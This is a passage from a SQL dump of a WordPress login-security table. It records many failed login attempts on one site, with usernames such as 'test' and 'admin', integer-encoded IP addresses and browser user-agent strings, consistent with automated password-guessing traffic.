(102668, 1499037976.423712, 1, 'loginFailInvalidUsername', 'test', 0, 1835389978, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102669, 1499037978.690519, 1, 'loginFailInvalidUsername', 'test', 0, 1835389978, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102670, 1499038048.377784, 1, 'loginFailInvalidUsername', 'test', 0, 2630741534, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102671, 1499038049.514564, 1, 'loginFailInvalidUsername', 'test', 0, 2630741534, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102672, 1499039147.888911, 1, 'loginFailInvalidUsername', 'test', 0, 3560722714, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102673, 1499039347.529170, 1, 'loginFailInvalidUsername', 'test', 0, 529683379, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102674, 1499039348.576926, 1, 'loginFailInvalidUsername', 'test', 0, 529683379, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102675, 1499041026.478001, 1, 'loginFailInvalidUsername', 'test', 0, 704190390, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102676, 1499041028.720948, 1, 'loginFailInvalidUsername', 'test', 0, 704190390, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102677, 1499041593.395358, 1, 'loginFailInvalidUsername', 'test', 0, 1435830550, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102678, 1499042413.025713, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1833976227, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102679, 1499043037.971001, 1, 'loginFailInvalidUsername', 'test', 0, 2998448244, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102680, 1499043039.133260, 1, 'loginFailInvalidUsername', 'test', 0, 2998448244, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102681, 1499043948.309728, 1, 'loginFailInvalidUsername', 'test', 0, 2982301914, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102682, 1499043949.678140, 1, 'loginFailInvalidUsername', 'test', 0, 2982301914, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102683, 1499044023.285588, 1, 'loginFailValidUsername', 'admin', 1, 1834070804, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102684, 1499045004.711710, 1, 'loginFailValidUsername', 'admin', 1, 3291887408, 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0'),
(102685, 1499045678.248040, 1, 'loginFailInvalidUsername', 'test', 0, 1544811101, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102686, 1499045686.727986, 1, 'loginFailInvalidUsername', '{login}', 0, 1309122769, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102687, 1499046578.785211, 1, 'loginFailInvalidUsername', 'test', 0, 737995010, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102688, 1499046580.589129, 1, 'loginFailInvalidUsername', 'test', 0, 737995010, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102689, 1499047263.555072, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1482953492, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102690, 1499048881.924652, 1, 'loginFailValidUsername', 'admin', 1, 1439668073, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102691, 1499049012.991906, 1, 'loginFailInvalidUsername', 'test', 0, 1570530821, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102692, 1499050520.928040, 1, 'loginFailInvalidUsername', '{login}', 0, 3134781161, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102693, 1499051283.717390, 1, 'loginFailValidUsername', 'admin', 1, 1315772161, 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)'),
(102694, 1499052141.879492, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1521598392, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102695, 1499053719.825589, 1, 'loginFailValidUsername', 'admin', 1, 1541066812, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102696, 1499053720.118750, 1, 'loginFailValidUsername', 'admin', 1, 90324398, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102697, 1499055289.534467, 1, 'loginFailInvalidUsername', '{login}', 0, 1387955566, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102698, 1499055656.364880, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539836950, 'Mozilla/5.0 (Windows NT 5.2) AppleWebKit/533.93.56 (KHTML, like Gecko) Version/5.5.0 Safari/532.10'),
(102699, 1499056807.504790, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1835212082, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102700, 1499058376.422645, 1, 'loginFailValidUsername', 'admin', 1, 1335524237, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102701, 1499059726.714206, 1, 'loginFailInvalidUsername', 'test', 0, 1293776065, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102702, 1499059727.833472, 1, 'loginFailInvalidUsername', 'test', 0, 1293776065, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102703, 1499060078.128560, 1, 'loginFailInvalidUsername', 'test', 0, 1570530821, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102704, 1499060079.055197, 1, 'loginFailInvalidUsername', 'test', 0, 1570530821, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102705, 1499061891.204035, 1, 'loginFailValidUsername', 'pablo', 3, 3230789411, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102706, 1499061894.345077, 1, 'loginFailInvalidUsername', 'vous', 0, 3230789411, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102707, 1499061896.454121, 1, 'loginFailInvalidUsername', 'training', 0, 3230789411, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102708, 1499061898.681291, 1, 'loginFailInvalidUsername', 'notre', 0, 3230789411, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102709, 1499061900.820032, 1, 'loginFailInvalidUsername', 'pour', 0, 3230789411, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102710, 1499061902.983269, 1, 'loginFailInvalidUsername', 'cross', 0, 3230789411, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102711, 1499061905.142334, 1, 'loginFailInvalidUsername', 'objectifs', 0, 3230789411, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102712, 1499061907.620757, 1, 'loginFailInvalidUsername', 'venez', 0, 3230789411, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102713, 1499061909.795708, 1, 'loginFailInvalidUsername', 'outils', 0, 3230789411, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102714, 1499061912.004307, 1, 'loginFailInvalidUsername', 'professionnel', 0, 3230789411, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102715, 1499062347.719616, 1, 'loginFailInvalidUsername', 'test', 0, 3065682442, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102716, 1499062349.309837, 1, 'loginFailInvalidUsername', 'test', 0, 3065682442, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102717, 1499063075.051007, 1, 'loginFailValidUsername', 'admin', 1, 1534992972, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102718, 1499063259.507156, 1, 'loginFailInvalidUsername', 'travail', 0, 3497108325, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102719, 1499063547.129948, 1, 'loginFailInvalidUsername', 'test', 0, 1978637058, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102720, 1499063549.077910, 1, 'loginFailInvalidUsername', 'test', 0, 1978637058, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102721, 1499064666.461268, 1, 'loginFailInvalidUsername', '{login}', 0, 1541066812, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0');
INSERT INTO `www2_wfLogins` (`id`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES
(102722, 1499066218.878886, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3279479929, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102723, 1499067738.696639, 1, 'loginFailInvalidUsername', 'test', 0, 3670527750, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102724, 1499067740.239982, 1, 'loginFailInvalidUsername', 'test', 0, 3670527750, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102725, 1499067777.725797, 1, 'loginFailValidUsername', 'admin', 1, 998235371, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102726, 1499070842.274753, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1833242594, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102727, 1499071392.195868, 1, 'loginFailValidUsername', 'admin', 1, 3344407295, 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; chromeframe/28.0.1500.37; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E)'),
(102728, 1499072407.184723, 1, 'loginFailValidUsername', 'admin', 1, 1424509955, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102729, 1499072454.078715, 1, 'loginFailInvalidUsername', 'test', 0, 1892205804, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102730, 1499072455.924951, 1, 'loginFailInvalidUsername', 'test', 0, 1892205804, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102731, 1499072826.760383, 1, 'loginFailInvalidUsername', 'test', 0, 3667643457, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102732, 1499072828.255731, 1, 'loginFailInvalidUsername', 'test', 0, 3667643457, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102733, 1499074064.925814, 1, 'loginFailInvalidUsername', '{login}', 0, 3105429741, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102734, 1499074831.107970, 1, 'loginFailInvalidUsername', 'test', 0, 2943245315, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102735, 1499074832.898561, 1, 'loginFailInvalidUsername', 'test', 0, 2943245315, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102736, 1499075655.533870, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1828828346, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102737, 1499077264.352548, 1, 'loginFailValidUsername', 'admin', 1, 1406483535, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102738, 1499078897.957499, 1, 'loginFailInvalidUsername', '{login}', 0, 3107039351, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102739, 1499079481.173916, 1, 'loginFailInvalidUsername', 'test', 0, 48928952, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102740, 1499079482.175091, 1, 'loginFailInvalidUsername', 'test', 0, 48928952, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102741, 1499080553.931040, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1564345887, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102742, 1499081829.866750, 1, 'loginFailInvalidUsername', 'test', 0, 1344927053, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102743, 1499081830.813709, 1, 'loginFailInvalidUsername', 'test', 0, 1344927053, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102744, 1499082106.261735, 1, 'loginFailInvalidUsername', 'test', 0, 1887825188, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102745, 1499082107.499325, 1, 'loginFailInvalidUsername', 'test', 0, 1887825188, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102746, 1499082134.675287, 1, 'loginFailValidUsername', 'admin', 1, 2537172334, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102747, 1499084454.257570, 1, 'loginFailInvalidUsername', 'test', 0, 1768455669, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102748, 1499084455.415793, 1, 'loginFailInvalidUsername', 'test', 0, 1768455669, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102749, 1499085305.044176, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1043021860, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102750, 1499086595.333466, 1, 'loginFailInvalidUsername', 'test', 0, 1728428970, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102751, 1499086596.785355, 1, 'loginFailInvalidUsername', 'test', 0, 1728428970, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102752, 1499087822.613390, 1, 'loginFailInvalidUsername', 'test', 0, 1730424002, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102753, 1499087823.926410, 1, 'loginFailInvalidUsername', 'test', 0, 1730424002, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102754, 1499087855.999532, 1, 'loginFailInvalidUsername', 'test', 0, 1729119484, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102755, 1499087857.479914, 1, 'loginFailInvalidUsername', 'test', 0, 1729119484, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102756, 1499087931.537796, 1, 'loginFailInvalidUsername', 'test', 0, 1578441763, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102757, 1499087932.517729, 1, 'loginFailInvalidUsername', 'test', 0, 1578441763, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102758, 1499088433.244541, 1, 'loginFailInvalidUsername', '{login}', 0, 637296469, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102759, 1499090312.667948, 1, 'loginFailInvalidUsername', 'test', 0, 1486763258, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102760, 1499090313.950752, 1, 'loginFailInvalidUsername', 'test', 0, 1486763258, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102761, 1499091645.600067, 1, 'loginFailInvalidUsername', 'test', 0, 1977494876, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102762, 1499091646.934594, 1, 'loginFailInvalidUsername', 'test', 0, 1977494876, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102763, 1499094148.708905, 1, 'loginFailInvalidUsername', 'test', 0, 1892043598, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102764, 1499094151.985321, 1, 'loginFailInvalidUsername', 'test', 0, 1892043598, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102765, 1499095491.682529, 1, 'loginFailInvalidUsername', 'test', 0, 694199286, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102766, 1499095561.094316, 1, 'loginFailInvalidUsername', 'test', 0, 1740655719, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102767, 1499095562.476210, 1, 'loginFailInvalidUsername', 'test', 0, 1740655719, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102768, 1499096901.439529, 1, 'loginFailInvalidUsername', 'test', 0, 1563216010, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102769, 1499096902.581277, 1, 'loginFailInvalidUsername', 'test', 0, 1563216010, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102770, 1499097527.397249, 1, 'loginFailInvalidUsername', 'test', 0, 3381206685, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102771, 1499097528.700184, 1, 'loginFailInvalidUsername', 'test', 0, 3381206685, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102772, 1499097756.256087, 1, 'loginFailInvalidUsername', 'test', 0, 1010049309, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102773, 1499097757.766263, 1, 'loginFailInvalidUsername', 'test', 0, 1010049309, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102774, 1499098263.441598, 1, 'loginFailInvalidUsername', 'test', 0, 636404794, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102775, 1499098265.800203, 1, 'loginFailInvalidUsername', 'test', 0, 636404794, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102776, 1499098821.335809, 1, 'loginFailInvalidUsername', 'test', 0, 2057522090, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102777, 1499098822.717216, 1, 'loginFailInvalidUsername', 'test', 0, 2057522090, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102778, 1499101772.454669, 1, 'loginFailValidUsername', 'admin', 1, 1539836950, 'Mozilla/5.0 (Windows NT 5.0) AppleWebKit/533.06.59 (KHTML, like Gecko) Version/5.5.1 Safari/532.14'),
(102779, 1499104692.140287, 1, 'loginFailInvalidUsername', 'test', 0, 2098853766, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102780, 1499104693.457165, 1, 'loginFailInvalidUsername', 'test', 0, 2098853766, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102781, 1499107561.826351, 1, 'loginFailInvalidUsername', 'test', 0, 694508115, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102782, 1499115131.450212, 1, 'loginFailValidUsername', 'admin', 1, 2745977144, 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.0.30618; .NET CLR 3.5.30729)'),
(102783, 1499116960.524394, 1, 'loginFailInvalidUsername', 'test', 0, 3033775030, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102784, 1499118227.834140, 1, 'loginFailInvalidUsername', 'test', 0, 1307411185, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102785, 1499118299.251856, 1, 'loginFailInvalidUsername', 'test', 0, 3135066780, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102786, 1499118406.841354, 1, 'loginFailInvalidUsername', 'test', 0, 2968138720, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102787, 1499118408.031233, 1, 'loginFailInvalidUsername', 'test', 0, 2968138720, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102788, 1499119749.948715, 1, 'loginFailInvalidUsername', 'test', 0, 1409303625, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102789, 1499119751.651875, 1, 'loginFailInvalidUsername', 'test', 0, 1409303625, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102790, 1499121171.014276, 1, 'loginFailInvalidUsername', 'test', 0, 1834078949, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102791, 1499121171.958197, 1, 'loginFailInvalidUsername', 'test', 0, 1834078949, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102792, 1499123546.582920, 1, 'loginFailInvalidUsername', 'test', 0, 3308563548, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102793, 1499123547.872403, 1, 'loginFailInvalidUsername', 'test', 0, 3308563548, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102794, 1499125922.241126, 1, 'loginFailInvalidUsername', 'test', 0, 1892329650, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102795, 1499125923.856840, 1, 'loginFailInvalidUsername', 'test', 0, 1892329650, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102796, 1499126680.128034, 1, 'loginFailInvalidUsername', 'test', 0, 974912594, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102797, 1499126681.453040, 1, 'loginFailInvalidUsername', 'test', 0, 974912594, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102798, 1499131954.572272, 1, 'loginFailInvalidUsername', 'test', 0, 1800230200, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102799, 1499132310.727528, 1, 'loginFailInvalidUsername', 'test', 0, 1040268236, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102800, 1499133607.560091, 1, 'loginFailInvalidUsername', 'test', 0, 3707610712, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102801, 1499133609.308690, 1, 'loginFailInvalidUsername', 'test', 0, 3707610712, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102802, 1499142278.768680, 1, 'loginFailInvalidUsername', 'test', 0, 701956706, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102803, 1499142302.469163, 1, 'loginFailInvalidUsername', 'test', 0, 701956706, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102804, 1499144295.108849, 1, 'loginFailInvalidUsername', 'test', 0, 623838970, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102805, 1499144296.249316, 1, 'loginFailInvalidUsername', 'test', 0, 623838970, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102806, 1499145039.397739, 1, 'loginFailInvalidUsername', 'test', 0, 409529464, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102807, 1499145040.492115, 1, 'loginFailInvalidUsername', 'test', 0, 409529464, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102808, 1499147039.182197, 1, 'loginFailInvalidUsername', 'test', 0, 1977819617, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102809, 1499147040.818821, 1, 'loginFailInvalidUsername', 'test', 0, 1977819617, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102810, 1499147614.621694, 1, 'loginFailInvalidUsername', 'test', 0, 1520582126, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102811, 1499147615.830364, 1, 'loginFailInvalidUsername', 'test', 0, 1520582126, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102812, 1499149393.329463, 1, 'loginFailInvalidUsername', 'test', 0, 1168938178, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102813, 1499149394.808477, 1, 'loginFailInvalidUsername', 'test', 0, 1168938178, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102814, 1499150691.364160, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539836950, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.61.24) Gecko/20173022 Firefox/45.61.24'),
(102815, 1499151004.286340, 1, 'loginFailInvalidUsername', 'test', 0, 1332931124, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102816, 1499151006.085863, 1, 'loginFailInvalidUsername', 'test', 0, 1332931124, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
